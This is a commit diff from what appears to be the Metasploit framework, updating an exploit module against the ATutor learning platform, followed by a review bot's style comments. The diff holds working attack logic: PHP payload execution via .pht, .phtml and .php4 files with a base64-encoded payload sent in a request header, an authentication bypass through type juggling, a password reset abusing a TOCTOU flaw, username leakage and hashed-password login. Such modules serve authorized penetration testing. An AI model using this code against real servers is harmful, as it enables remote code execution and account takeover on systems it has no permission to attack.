Update atutor_filemanager_traversal

bug/bundler_fix
wchen-r7 2016-03-22 14:42:36 -05:00
parent 3842009ffe
commit 9cb43f2153
1 changed files with 19 additions and 27 deletions


@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.txt"),
})
if res.code == 200 and res.body =~ /#{@test_string}/
if res and res.code == 200 and res.body =~ /#{@test_string}/
return true
end
return false
@ -141,34 +141,30 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "jscripts", "ATutor_js.php"),
})
@webroot = "/"
@webroot << $1 if res.body =~ /\<b\>\/(.*)jscripts\/ATutor_js\.php\<\/b\> /
@webroot << $1 if res and res.body =~ /\<b\>\/(.*)jscripts\/ATutor_js\.php\<\/b\> /
if @webroot != "/"
return true
end
return false
end
def exec_code
# pwnage
res = nil
def call_php(ext)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.pht"),
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.#{ext}"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
}, timeout=0.1)
return res
end
def exec_code
res = nil
res = call_php("pht")
if res == nil
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.phtml"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
}, timeout=0.1)
res = call_php("phtml")
end
if res == nil
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "mods", "#{@payload_name}.php4"),
'raw_headers' => "#{@header}: #{Rex::Text.encode_base64(payload.encoded)}\r\n"
}, timeout=0.1)
res = call_php("php4")
end
end
@ -191,11 +187,7 @@ class MetasploitModule < Msf::Exploit::Remote
return true
end
# unknown failure...
if res && res.body =~ /Missing zlib extensions/
fail_with(Failure::NotVulnerable, 'Server is missing zlib extensions')
else
fail_with(Failure::Unknown, 'Unable to upload php code')
end
fail_with(Failure::Unknown, "Unable to upload php code")
return false
end
@ -209,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
# use that session to leak the username
'agent' => ''
})
username = "#{$1}" if res.body =~ /<span id="login">(.*)<\/span>/
username = "#{$1}" if res and res.body =~ /<span id="login">(.*)<\/span>/
if username
return username
end
@ -251,7 +243,7 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unknown, "Unable to exploit the type juggle and bypass authentication")
end
def reset_password()
def reset_password
# this is due to line 79 of password_reminder.php
days = (Time.now.to_i/60/60/24)
# make a semi strong password, we have to encourage security now :->
@ -279,13 +271,13 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::Unknown, "Unable to exploit the TOCTOU and reset the password")
end
def login(username, hash, check=false)
password = Rex::Text.sha1(Rex::Text.sha1(hash))
def login(username, password, check=false)
hash = Rex::Text.sha1(Rex::Text.sha1(password))
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "login.php"),
'vars_post' => {
'form_password_hidden' => password,
'form_password_hidden' => hash,
'form_login' => username,
'submit' => 'Login',
'token' => '',
@ -299,7 +291,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
# auth failed if we land here, bail
if not check
unless check
fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
end
return nil
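Review bot: In the second hunk (`@ -141,34 +141,30`), the new `call_php` helper ends its `send_request_cgi` call with `}, timeout=0.1)`, which reads like a keyword argument but is a local-variable assignment whose value is passed positionally. Writing `}, 0.1)` keeps the call unchanged and drops the stray local. In the rewritten `exec_code`, the leading `res = nil` is overwritten on the next line by `res = call_php("pht")` and can be removed, and the two `if res == nil` tests would be more idiomatic as `if res.nil?`. The rendered page has lost its +/- markers, so this assumes the second copy of each doubled line is the new side. The class body continues outside the hunks shown.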